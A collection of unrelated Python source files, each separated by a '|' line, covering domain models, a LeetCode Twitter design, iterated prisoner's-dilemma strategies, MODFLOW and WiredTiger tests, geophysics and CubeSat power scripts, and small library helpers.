first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class User(BaseAggregate):
email = String(max_length=255, required=True, unique=True)
password = String(max_length=3026)
class Email(BaseValueObject):
REGEXP = r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?"
# This is the external facing data attribute
address = String(max_length=254, required=True)
def clean(self):
"""Business rules of Email address"""
errors = defaultdict(list)
if not bool(re.match(Email.REGEXP, self.address)):
errors["address"].append("is invalid")
return errors
class ComplexUser(BaseAggregate):
email = ValueObject(Email, required=True)
password = String(required=True, max_length=255)
class Provider(BaseAggregate):
name = ProteanText()
about = ProteanText()
class ProviderCustomModel(BaseModel):
id = Keyword()
name = Text(fields={"raw": Keyword()})
about = Text()
class Meta:
schema = "providers"
class Receiver(BaseAggregate):
name = String()
age = Integer()
|
# https://leetcode.com/problems/design-twitter/
#
# algorithms
# Medium (27.98%)
# Total Accepted: 37,655
# Total Submissions: 134,594
from collections import defaultdict
from bisect import insort
class Twitter(object):
def __init__(self):
"""
Initialize your data structure here.
"""
        self.follow_map = defaultdict(set)  # users this user follows
        self.followed_map = defaultdict(set)  # users who follow this user
        self.tweet_map = defaultdict(list)  # per-user news feed: own tweets plus followees' tweets
        self.post_map = defaultdict(list)  # tweets each user has posted
self.tweet_stamp = 0
def postTweet(self, userId, tweetId):
"""
Compose a new tweet.
:type userId: int
:type tweetId: int
:rtype: None
"""
self.post_map[userId].append((self.tweet_stamp, tweetId))
for id in self.followed_map[userId]:
insort(self.tweet_map[id], (self.tweet_stamp, tweetId))
insort(self.tweet_map[userId], (self.tweet_stamp, tweetId))
self.tweet_stamp += 1
def getNewsFeed(self, userId):
"""
Retrieve the 10 most recent tweet ids in the user's news feed. Each item in the news feed must be posted by users who the user followed or by the user herself. Tweets must be ordered from most recent to least recent.
:type userId: int
:rtype: List[int]
"""
length = len(self.tweet_map[userId])
if length <= 10:
arr = self.tweet_map[userId]
else:
arr = self.tweet_map[userId][length - 10:]
return [item[-1] for item in reversed(arr)]
def follow(self, followerId, followeeId):
"""
Follower follows a followee. If the operation is invalid, it should be a no-op.
:type followerId: int
:type followeeId: int
:rtype: None
"""
if followerId == followeeId:
return
if followeeId in self.follow_map[followerId]:
return
self.follow_map[followerId].add(followeeId)
self.followed_map[followeeId].add(followerId)
for stamp, tweetId in self.post_map[followeeId]:
insort(self.tweet_map[followerId], (stamp, tweetId))
def unfollow(self, followerId, followeeId):
"""
Follower unfollows a followee. If the operation is invalid, it should be a no-op.
:type followerId: int
:type followeeId: int
:rtype: None
"""
if followerId == followeeId:
return
if followeeId not in self.follow_map[followerId]:
return
self.follow_map[followerId].remove(followeeId)
self.followed_map[followeeId].remove(followerId)
tweet_map = set()
for stamp, _ in self.post_map[followeeId]:
tweet_map.add(stamp)
tmp = []
for stamp, tweetId in self.tweet_map[followerId]:
if stamp not in tweet_map:
tmp.append((stamp, tweetId))
self.tweet_map[followerId] = tmp
# Your Twitter object will be instantiated and called as such:
# obj = Twitter()
# obj.postTweet(userId,tweetId)
# param_2 = obj.getNewsFeed(userId)
# obj.follow(followerId,followeeId)
# obj.unfollow(followerId,followeeId)
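# Minimal self-check of the structure above (illustrative), runnable as a script:
if __name__ == "__main__":
    t = Twitter()
    t.postTweet(1, 5)                      # user 1 posts tweet 5
    assert t.getNewsFeed(1) == [5]
    t.follow(1, 2)
    t.postTweet(2, 6)                      # followee's tweet enters user 1's feed
    assert t.getNewsFeed(1) == [6, 5]
    t.unfollow(1, 2)                       # and is withdrawn again on unfollow
    assert t.getNewsFeed(1) == [5]
    print("Twitter demo passed")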
|
from const import result
import random
C, D = True, False
def opponent(r):
    # True when the round result indicates the opponent cooperated.
    return r == result.COOP or r == result.DEFECT
# tit for tat
class Tft:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
# tit for two tat
class Tftt:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
self.last_last_reaction = C
def run(self):
        return self.last_reaction or self.last_last_reaction
def next(self, r):
self.score += r.value
self.last_last_reaction = self.last_reaction
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
self.last_last_reaction = C
return self.score
# always coop
class AlwaysCoop:
def __init__(self) -> None:
self.score = 0
def run(self):
return C
def next(self, r):
self.score += r.value
def end(self):
return self.score
# always defect
class AlwaysDefect:
def __init__(self) -> None:
self.score = 0
def run(self):
return D
def next(self, r):
self.score += r.value
def end(self):
return self.score
# perfect random(50%)
class Random:
def __init__(self) -> None:
self.score = 0
def run(self):
return random.choice([C, D])
def next(self, r):
self.score += r.value
def end(self):
return self.score
# first defect, opponent coop rate - coop(>50%) / defect(<=50%)
class Downing:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return D
if self.coop_count / self.game_count > 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
# first coop, opponent coop rate - coop(>=50%) / defect(<50%)
class Downing2:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return C
if self.coop_count / self.game_count >= 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
# coop, always defect once defected
class Grudger:
def __init__(self) -> None:
self.score = 0
self.defected = False
def run(self):
if self.defected:
return D
return C
def next(self, r):
self.score += r.value
if not opponent(r):
self.defected = True
def end(self):
return self.score
# tft but defect by 10% rate
class Joss:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
if random.randint(1, 10) == 1:
return D
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
# wip
class Tester:
def __init__(self) -> None:
self.score = 0
self.decision = True
self.test_tft = False
self.game_count = 0
def run(self):
if self.game_count == 0:
return D
return self.decision
def next(self, r):
self.score += r.value
        if self.game_count == 1 and not opponent(r):
self.test_tft = True
elif self.test_tft:
self.decision = opponent(r)
elif self.game_count <= 2:
self.decision = True
else:
self.decision = not self.decision
self.game_count += 1
def end(self):
self.decision = True
self.test_tft = False
self.game_count = 0
return self.score
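# Tournament sketch (comment-only, since the semantics of const.result are not
# shown in this file; it is assumed to map each round outcome to a payoff via
# .value and to the COOP/DEFECT members tested in opponent() above):
#   import itertools
#   strategies = [Tft(), Tftt(), AlwaysCoop(), AlwaysDefect(), Random(),
#                 Downing(), Downing2(), Grudger(), Joss()]
#   for a, b in itertools.combinations(strategies, 2):
#       for _ in range(200):  # feed run() moves into a payoff lookup,
#           ...               # pass the resulting result values to next()
#       a.end(); b.end()      # collect scores and reset state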
|
import os
import pytest
import sys
import numpy as np
import shutil
import subprocess
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
import targets
mf6_exe = os.path.abspath(targets.target_dict["mf6"])
testname = "uzf_3lay_srfdchk"
testdir = os.path.join("temp", testname)
os.makedirs(testdir, exist_ok=True)
everything_was_successful = True
iuz_cell_dict = {}
cell_iuz_dict = {}
def build_model():
nlay, nrow, ncol = 3, 1, 10
nper = 1
perlen = [20.0]
nstp = [10]
tsmult = len(perlen) * [1.0]
delr = 1.0
delc = 1.0
strt = -25
botm = [
[-5.0, -4.0, -3.0, -3.0, -2.0, -5.0, -4.0, -3.0, -3.0, -2.0],
[-20, -20, -20, -20, -20, -20, -20, -20, -20, -20],
[-30, -30, -30, -30, -30, -30, -30, -30, -30, -30],
]
nouter, ninner = 100, 300
hclose, rclose, relax = 1e-9, 1e-3, 0.97
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
name = testname
# build MODFLOW 6 files
ws = testdir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name=mf6_exe, sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, newtonoptions="NEWTON", save_flows=True
)
# create iterative model solution and register the gwf model with it
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
complexity="MODERATE",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="DBD",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
sim.register_ims_package(ims, [gwf.name])
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=0.0,
botm=botm,
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=True, icelltype=1, k=100.0, k33=10
)
# aquifer storage
sto = flopy.mf6.ModflowGwfsto(
gwf, iconvert=1, ss=1e-5, sy=0.2, transient=True
)
# chd files
chdval = -3.0
chdspd = {0: [[(2, 0, 0), chdval]]}
chd = flopy.mf6.ModflowGwfchd(
gwf, print_flows=True, stress_period_data=chdspd
)
# transient uzf info
# iuzno cellid landflg ivertcn surfdp vks thtr thts thti eps [bndnm]
uzf_pkdat = [
[0, (0, 0, 1), 1, 8, 6, 1, 0.05, 0.35, 0.05, 4, "uzf01"],
[1, (0, 0, 2), 1, 9, 6, 1, 0.05, 0.35, 0.05, 4, "uzf02"],
[2, (0, 0, 3), 1, 10, 6, 1, 0.05, 0.35, 0.05, 4, "uzf03"],
[3, (0, 0, 4), 1, 11, 6, 1, 0.05, 0.35, 0.05, 4, "uzf04"],
[4, (0, 0, 5), 1, 12, 6, 1, 0.05, 0.35, 0.05, 4, "uzf05"],
[5, (0, 0, 6), 1, 13, 6, 1, 0.05, 0.35, 0.05, 4, "uzf06"],
[6, (0, 0, 7), 1, 14, 6, 1, 0.05, 0.35, 0.05, 4, "uzf07"],
[7, (0, 0, 8), 1, 15, 6, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
        [8, (1, 0, 1), 0, 16, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf09"],
[9, (1, 0, 2), 0, 17, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf10"],
[10, (1, 0, 3), 0, 18, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf11"],
[11, (1, 0, 4), 0, 19, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf12"],
[12, (1, 0, 5), 0, 20, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf13"],
[13, (1, 0, 6), 0, 21, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf14"],
[14, (1, 0, 7), 0, 22, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf15"],
[15, (1, 0, 8), 0, 23, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf16"],
[16, (2, 0, 1), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf17"],
[17, (2, 0, 2), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf18"],
[18, (2, 0, 3), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf19"],
[19, (2, 0, 4), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf20"],
[20, (2, 0, 5), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf21"],
[21, (2, 0, 6), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf22"],
[22, (2, 0, 7), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf23"],
[23, (2, 0, 8), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf24"],
]
for itm in uzf_pkdat:
iuz_cell_dict.update({itm[0]: (itm[1][0], itm[1][1], itm[1][2])})
cell_iuz_dict.update({(itm[1][0], itm[1][1], itm[1][2]): itm[0]})
extdp = 15.0
pet = 0.001
zero = 0.0
uzf_spd = {
0: [
[0, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[1, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[2, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[3, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[4, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[5, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[6, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[7, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[8, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[9, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[10, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[11, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[12, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[13, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[14, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[15, zero, pet, extdp, 7.0e-02, zero, zero, zero],
]
}
uzf = flopy.mf6.ModflowGwfuzf(
gwf,
print_flows=True,
save_flows=True,
simulate_et=True,
simulate_gwseep=True,
linear_gwet=True,
boundnames=True,
ntrailwaves=15,
nwavesets=40,
nuzfcells=len(uzf_pkdat),
packagedata=uzf_pkdat,
perioddata=uzf_spd,
budget_filerecord="{}.uzf.bud".format(name),
filename="{}.uzf".format(name),
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
filename="{}.oc".format(name),
)
return sim
# - No need to change any code below
def test_mf6model():
# build and run the test model
sim = build_model()
sim.write_simulation()
sim.run_simulation()
# ensure that the error msg is contained in the mfsim.lst file
    with open(os.path.join(testdir, "mfsim.lst"), "r") as f:
        lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
    assert error_count == 8, (
        "error count = " + str(error_count) + " but should equal 8"
    )
print("Finished running surfdep check")
return
def main():
# build and run the test model
sim = build_model()
sim.write_simulation()
sim.run_simulation()
# ensure that the error msg is contained in the mfsim.lst file
    with open(os.path.join(testdir, "mfsim.lst"), "r") as f:
        lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
    assert error_count == 8, (
        "error count = " + str(error_count) + " but should equal 8"
    )
print("Finished running surfdep check")
return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
|
import numpy as np
# Read scec input file
fid = open("tpv29_tpv30_geometry_25m_data.txt")
line = fid.readline()
line = fid.readline()
header = [float(a) for a in line.split()]
nx, ny, lx, ly = header
roughness = np.loadtxt(fid)
roughness = roughness[:, 4]
fid.close()
# create x and y vectors
x = np.linspace(-lx / 2, lx / 2, int(nx) + 1)
y = np.linspace(0, ly, int(ny) + 1)
# write mytopo_tpv29
fout = open("mytopo_tpv29", "w")
fout.write("%d %d\n" % (nx + 1, ny + 1))
np.savetxt(fout, x, fmt="%f")
np.savetxt(fout, y, fmt="%f")
np.savetxt(fout, roughness, fmt="%f")
fout.close()
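# Resulting file layout (from the writes above): a header line "nx+1 ny+1",
# then the (nx+1) x-coordinates, the (ny+1) y-coordinates, and finally the
# roughness samples, one value per line.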
|
import pytest
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
@pytest.fixture
def inmemory_ebnt():
ebnt = Ebonite.inmemory()
yield ebnt
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(inmemory_ebnt, 'inmemory')
|
"""
example1.py
"A simple example how to use the CubeSat-Power-Estimation tool."
@author: Johan Monster (https://github.com/Hans-Bananendans/)
"""
# Import packages
import numpy as np
import pandas as pd
from mission import Mission
# Defining the config
config = {
"years_passed" : 0, # How many [years] the satellite has been in space for
"battery_capacity" : 81000, # Battery capacity in [W.s] (or: Joule)
"battery_degradation_factor" : 0.04,
"battery_init" : 0.5, # 0.5 = Battery begins at 50% charge
"panel_degradation_factor" : 0.02,
"blip_period" : 30, # Currently unused, telemetry blip period
"blip_duration" : 1, # Currently unused, telemetry blip duration
"no_blips" : ["downlink"], # Currently unused
"orbital_altitude" : 550 # Orbital altitude in [km]
}
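# Quick sanity check on the figures above (illustrative; how Mission actually
# applies these factors is defined in mission.py, not here):
#   81000 W.s / 3600 = 22.5 Wh of nameplate battery capacity, and with the
#   0.04 per-year degradation factor the usable fraction after n years would
#   be roughly (1 - 0.04) ** n.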
# List of the names of all used EPS channels.
channels = ["None", "5V_1", "5V_2", "5V_3", "5V_4", "3.3V_1", \
"3.3V_2", "3.3V_3", "3.3V_4", "Var_rail"]
# Dict of typical voltage supplied to each channel.
channel_voltages = {
"5V_1" : 5,
"5V_2" : 5,
"5V_3" : 5,
"5V_4" : 5,
"3.3V_1" : 3.3,
"3.3V_2" : 3.3,
"3.3V_3" : 3.3,
"3.3V_4" : 3.3,
"Var_rail" : 6.5 # Can between 6.5-8 VDC, highest current is at 6.5V
}
# Dict specifiying which device is on which EPS channel
device_channels = {
"adcs" : "5V_4",
"payload_dice" : "5V_3",
"payload_bitflip" : "3.3V_3",
"antenna" : "3.3V_4",
"obc" : "5V_2",
"obc_board" : "5V_2",
"rx" : "Var_rail",
"tx" : "Var_rail",
"eps" : "None",
"sensors_1" : "3.3V_2",
"sensors_2" : "3.3V_4",
}
# List of all possible OpStates the satellite can be in.
# This list must be consistent with the specified power.xlsx
state_list = ["idle","recharge","dice_payload","wheel_unloading", \
"transponder","downlink","safe_mode","recovery_mode", \
"detumbling_mode"]
# Dict of which colour will be used for each OpState whilst plotting
state_colours = {
"idle" : "#ffffff",
"recharge" : "#2ca02c",
"dice_payload" : "#8000ff",
"wheel_unloading" : "#0080ff",
"transponder" : "#ff8000",
"downlink" : "#ff0000",
"safe_mode" : "#4000ff",
"recovery_mode" : "#777777",
"detumbling_mode" : "#ff00ff"
}
# Baby's first satellite schedule
schedule1 = {
0 : "idle",
50 : "downlink",
100 : "recharge"
}
# Loading the power frame, or the device/OpState table
power_frame = pd.read_excel('power.xlsx', index_col=0)
# Loading the two power input vectors, generated by CubeSat-Solar-Estimator
p_sun = np.load("P_sun.npy")
p_alb = np.load("P_alb.npy")
# Assembling the mission object
m1 = Mission(config, device_channels, state_list, channels, \
power_frame, p_sun, p_alb)
# Calling the Mission.propagate() method to start the simulation
results = m1.propagate(schedule1, tsim=200, dt=1)
# Plotting
m1.plot_timeline_power(state_colours)
|
from __future__ import annotations
from coredis.response.callbacks import (
DictCallback,
ResponseCallback,
SimpleStringCallback,
)
from coredis.response.utils import flat_pairs_to_dict
from coredis.typing import Any, AnyStr, Mapping, Tuple, Union
class ACLLogCallback(ResponseCallback):
def transform(
self, response: Any, **options: Any
) -> Union[bool, Tuple[Mapping[AnyStr, AnyStr], ...]]:
if options.get("reset"):
return SimpleStringCallback()(response)
else:
return tuple(
DictCallback(transform_function=flat_pairs_to_dict)(r) for r in response
)
|
#!/usr/bin/env python
#
# Public Domain 2014-2017 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# test_timestamp04.py
# Timestamps: Test that rollback_to_stable obeys expected visibility rules
#
from suite_subprocess import suite_subprocess
import wiredtiger, wttest
from wtscenario import make_scenarios
def timestamp_str(t):
return '%x' % t
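# e.g. timestamp_str(10) == 'a': timestamps are handed to WiredTiger as
# lower-case hexadecimal strings.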
class test_timestamp04(wttest.WiredTigerTestCase, suite_subprocess):
table_ts_log = 'table:ts04_ts_logged'
table_ts_nolog = 'table:ts04_ts_nologged'
table_nots_log = 'table:ts04_nots_logged'
table_nots_nolog = 'table:ts04_nots_nologged'
conncfg = [
('nolog', dict(conn_config='', using_log=False)),
('V1', dict(conn_config=',log=(enabled),compatibility=(release="2.9")', using_log=True)),
('V2', dict(conn_config=',log=(enabled)', using_log=True)),
]
# Minimum cache_size requirement of lsm is 31MB
types = [
('col_fix', dict(empty=1, cacheSize='cache_size=20MB', extra_config=',key_format=r,value_format=8t')),
('col_var', dict(empty=0, cacheSize='cache_size=20MB', extra_config=',key_format=r')),
('lsm', dict(empty=0, cacheSize='cache_size=31MB', extra_config=',type=lsm')),
('row', dict(empty=0, cacheSize='cache_size=20MB', extra_config='',)),
('row-smallcache', dict(empty=0, cacheSize='cache_size=2MB', extra_config='',)),
]
scenarios = make_scenarios(conncfg, types)
# Check that a cursor (optionally started in a new transaction), sees the
# expected values.
def check(self, session, txn_config, tablename, expected, missing=False, prn=False):
if txn_config:
session.begin_transaction(txn_config)
cur = session.open_cursor(tablename, None)
if missing == False:
actual = dict((k, v) for k, v in cur if v != 0)
if prn == True:
print "CHECK : Expected"
print expected
print "CHECK : Actual"
print actual
self.assertTrue(actual == expected)
# Search for the expected items as well as iterating
for k, v in expected.iteritems():
if missing == False:
self.assertEqual(cur[k], v, "for key " + str(k))
else:
cur.set_key(k)
if self.empty:
# Fixed-length column-store rows always exist.
self.assertEqual(cur.search(), 0)
else:
self.assertEqual(cur.search(), wiredtiger.WT_NOTFOUND)
cur.close()
if txn_config:
session.commit_transaction()
# This test varies the cache size and so needs to set up its own connection.
# Override the standard methods.
def setUpConnectionOpen(self, dir):
return None
def setUpSessionOpen(self, conn):
return None
def ConnectionOpen(self, cacheSize):
self.home = '.'
conn_params = 'create,' + \
cacheSize + ',error_prefix="%s" %s' % (self.shortid(), self.conn_config)
try:
self.conn = wiredtiger.wiredtiger_open(self.home, conn_params)
except wiredtiger.WiredTigerError as e:
print "Failed conn at '%s' with config '%s'" % (dir, conn_params)
self.session = self.conn.open_session(None)
def test_rollback_to_stable(self):
if not wiredtiger.timestamp_build():
self.skipTest('requires a timestamp build')
self.ConnectionOpen(self.cacheSize)
# Configure small page sizes to ensure eviction comes through and we
# have a somewhat complex tree
config_default = 'key_format=i,value_format=i,memory_page_max=32k,leaf_page_max=8k,internal_page_max=8k'
config_nolog = ',log=(enabled=false)'
#
# Open four tables:
# 1. Table is logged and uses timestamps.
# 2. Table is not logged and uses timestamps.
# 3. Table is logged and does not use timestamps.
# 4. Table is not logged and does not use timestamps.
#
self.session.create(self.table_ts_log, config_default + self.extra_config)
cur_ts_log = self.session.open_cursor(self.table_ts_log)
self.session.create(self.table_ts_nolog, config_default + config_nolog + self.extra_config)
cur_ts_nolog = self.session.open_cursor(self.table_ts_nolog)
self.session.create(self.table_nots_log, config_default + self.extra_config)
cur_nots_log = self.session.open_cursor(self.table_nots_log)
self.session.create(self.table_nots_nolog, config_default + config_nolog + self.extra_config)
cur_nots_nolog = self.session.open_cursor(self.table_nots_nolog)
# Insert keys each with timestamp=key, in some order
key_range = 10000
keys = range(1, key_range + 1)
# Set keys 1-key_range to value 1.
for k in keys:
cur_nots_log[k] = 1
cur_nots_nolog[k] = 1
self.session.begin_transaction()
cur_ts_log[k] = 1
cur_ts_nolog[k] = 1
self.session.commit_transaction('commit_timestamp=' + timestamp_str(k))
# Setup an oldest timestamp to ensure state remains in cache.
if k == 1:
self.conn.set_timestamp('oldest_timestamp=' + timestamp_str(1))
# Scenario: 1
# Check that we see all the inserted values(i.e 1) in all tables
latest_ts = timestamp_str(key_range)
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[:]))
# Scenario: 2
# Roll back half timestamps.
stable_ts = timestamp_str(key_range / 2)
self.conn.set_timestamp('stable_timestamp=' + stable_ts)
self.conn.rollback_to_stable()
# Check that we see the inserted value (i.e. 1) for all the keys in
# non-timestamp tables
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 1) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 1) for k in keys[:]))
# For non-logged tables the behavior is consistent across connections
# with or without log enabled
# Check that we see the inserted value (i.e. 1) for the keys in a
# timestamp table till the stable_timestamp only.
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[(key_range / 2 + 1):]), missing=True)
# For logged tables behavior changes for rollback_to_stable based on
# whether connection level logging is enabled or not.
if self.using_log == True:
# When log is enabled, none of the keys will be rolled back.
# Check that we see all the keys
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[:]))
else:
# When log is disabled, keys will be rolled back till stable_timestamp
# Check that we see the insertions are rolled back in timestamp tables
# till the stable_timestamp
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[(key_range / 2 + 1):]), missing=True)
# Bump the oldest timestamp, we're not going back...
self.conn.set_timestamp('oldest_timestamp=' + stable_ts)
# Update the values again in preparation for rolling back more
for k in keys:
cur_nots_log[k] = 2
cur_nots_nolog[k] = 2
self.session.begin_transaction()
cur_ts_log[k] = 2
cur_ts_nolog[k] = 2
self.session.commit_transaction('commit_timestamp=' + timestamp_str(k + key_range))
# Scenario: 3
# Check that we see all values updated (i.e 2) in all tables
latest_ts = timestamp_str(2 * key_range)
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 2) for k in keys[:]))
# Scenario: 4
# Advance the stable_timestamp by a quarter range and rollback.
# three-quarter timestamps will be rolled back.
stable_ts = timestamp_str(key_range + key_range / 4)
self.conn.set_timestamp('stable_timestamp=' + stable_ts)
self.conn.rollback_to_stable()
# Check that we see the updated value (i.e. 2) for all the keys in
# non-timestamp tables
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_log, dict((k, 2) for k in keys[:]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_nots_nolog, dict((k, 2) for k in keys[:]))
# For non-logged tables the behavior is consistent across connections
# with or without log enabled
# Check that we see only half key ranges in timestamp tables. we see
# the updated value (i.e. 2) for the first quarter keys and old values
# (i.e. 1) for the second quarter keys.
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 2 if k <= key_range / 4 else 1)
for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_nolog, dict((k, 1) for k in keys[(1 + key_range / 2):]), missing=True)
# For logged tables behavior changes for rollback_to_stable based on
# whether connection level logging is enabled or not.
if self.using_log == True:
# When log is enabled, none of the keys will be rolled back.
# Check that we see all the keys
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 2) for k in keys[:]))
else:
# When log is disabled, keys will be rolled back till stable_timestamp
# Check that we see only half key ranges in timestamp tables. we see
# the updated value (i.e. 2) for the first quarter keys and old values
# (i.e. 1) for the second quarter keys.
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, (2 if k <= key_range / 4 else 1))
for k in keys[:(key_range / 2)]))
self.check(self.session, 'read_timestamp=' + latest_ts,
self.table_ts_log, dict((k, 1) for k in keys[(1 + key_range / 2):]), missing=True)
if __name__ == '__main__':
wttest.run()
|
from tensornetwork.network_components import Node, CopyNode, Edge
_COMPONENTS = {
"Node": Node,
"CopyNode": CopyNode,
"Edge": Edge,
}
def get_component(name):
if name not in _COMPONENTS:
raise ValueError("Component {} does not exist".format(name))
